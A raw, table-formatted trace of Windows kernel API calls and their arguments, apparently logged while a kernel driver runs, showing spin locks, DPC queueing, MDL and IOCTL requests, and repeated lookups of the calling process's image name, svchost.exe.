| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe000461ff680 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000bbc, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000bbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000bbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000bbc, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffe |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461ff680 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003b4669f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461ff680, MemoryDescriptorList_unk_out = 0xffffe000461ff680 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003b4669f0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b4669f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a786250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe000461ff680 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c62d010, Irp_unk_out = 0xffffe0003c62d010, ret_val_out = 0x103 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000a60, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000a60, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000a60, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a60, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffe |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76fd0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461ff680 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003b79bad0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461ff680, MemoryDescriptorList_unk_out = 0xffffe000461ff680 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003b79bad0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b79bad0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe000461ff680 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000cac, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cac, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cac, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000cac, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffd |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a769aac, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461ff680 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003b79bad0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461ff680, MemoryDescriptorList_unk_out = 0xffffe000461ff680 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003b79bad0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b79bad0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe000461ff680 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b6a3640, Irp_unk_out = 0xffffe0003b6a3640, ret_val_out = 0x103 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000f98, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000f98, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000f98, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000f98, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffc |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c251f40 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c8359e0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c251f40, MemoryDescriptorList_unk_out = 0xffffe0003c251f40 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c8359e0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c8359e0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c251f40 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80000ff0, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ff0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
